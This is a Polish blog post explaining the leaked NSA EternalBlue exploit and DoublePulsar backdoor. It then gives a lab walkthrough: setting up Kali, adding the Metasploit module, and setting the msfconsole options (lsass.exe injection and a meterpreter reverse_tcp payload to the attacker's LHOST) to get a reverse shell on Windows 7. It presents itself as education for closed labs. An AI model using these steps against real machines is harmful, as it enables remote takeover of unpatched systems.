CyberSec · 9 maja, 2023 0

DoublePulsar EternalBlue Backdoor i Exploit stworzony przez NSA

DoublePulsar i EternalBlue to nazwy backdooora i exploita opracowanych przez amerykańską agencję wywiadowczą NSA. DoublePulsar umożliwia uruchomienie dowolnego kodu w trybie uprzywilejowanym, z poziomu sterownika. Kod jest kopiowany do pamięci procesu, który już działa, a następnie jest wykonywany. DoublePulsar był wykorzystywany wraz z EternalBlue który wykorzystywał bugi w protokole SMB. Po wycieku tych narzędzi i ujawnieniu ich przez grupę The Shadow Brokers stały się popularne w różnych atakach hakerskich np. w głośnym ataku ransomware WannaCry z 2017r.

Pokażę Ci jak dodać moduł do Metasploit Framewmork oraz jak wyglądał atak tymi wirusami.

Wpis ten ma charakter edukacyjny przeprowadzanie ataków na nie swoje maszyny jest nielegalne.
Pokazywane tu ataki wykonywane są w zamkniętych środowiskach i mają na celu uświadamiać o zagrożeniu.


Lab

Aby odtworzyć taki atak w naszym laboratorium powinniśmy mieć:

  1. Komputer lub wirtualną maszynę z Kali Linux
  2. Wirtualną maszynę z zainstalowanym Windows 7 x64 6.1.7600
  3. EternalBlue, DoublePulsar repo z Githuba

Konfig Kali


  • Przełącz się na konto root dodaj architekturę i386 i wykonaj instalację wine32

  • Ściągnij Pythona 2.7.14 instalator x86 MSI ze strony python.org i zapisz w folderze Downloads

  • Przejdź do folderu Downloads i zainstaluj plik python-2.7.14.msi na wine
  • Przejdź przez standardową instalację w domyślnej lokalizacji na dysku C

  • Skopiuj plik eternalblue-doublepulsar.rb oraz folder deps do /usr/share/metasploit-framework/modules/exploits/windows/smb

  • Na sam koniec konfiguracji przeskocz lokalizacje wyżej do folderu EternalBlue i skopiuj cały folder Eternalblue-Doublepulsar-Metasploit do /root

Metasploit atak EternalBlue


  • Uruchom metasploit framework msfconsole i wybierze dodany exploit use exploit/windows/smb/eternalblue_doublepulsar

  • Teraz przejdź do opcji i ustaw payload
  1. set PROCESSINJECT lsass.exe
  2. set RHOST adres IP naszej ofiary (Windows 7 x64)
  3. set TARGETARCHITECTURE x64
  4. set payload windows/x64/meterpreter/reverse_tcp
  5. set LHOST adres IP atakującego czyli Kali
payload eternalblue  doublepulsar

  • Uruchom atak poleceniem run
reverse_shell eternalblue

EternalBlue nie potrzebował wcześniej infekować komputera, wykorzystywał bugi w protokole SMB
DoublePulsar uruchamia kod na komputerze ofiary, otwierając nam reverse shell.

  • Wpisz shell aby przejść do powłoki Windows
reverse_shell eternalblue

Masz pełną kontrolę nad systemem Windows. Gratulacje! 

Pomimo udostępnienia poprawek wiele lat temu, EternalBlue nadal jest jednym z najczęściej wybieranych exploitów wymierzonych w protokół SMB.

Nie zapomnij wpaść na tiktoka i youtube żeby zobaczyć jak przeprowadzam ataki różnymi narzędziami.

Cześć!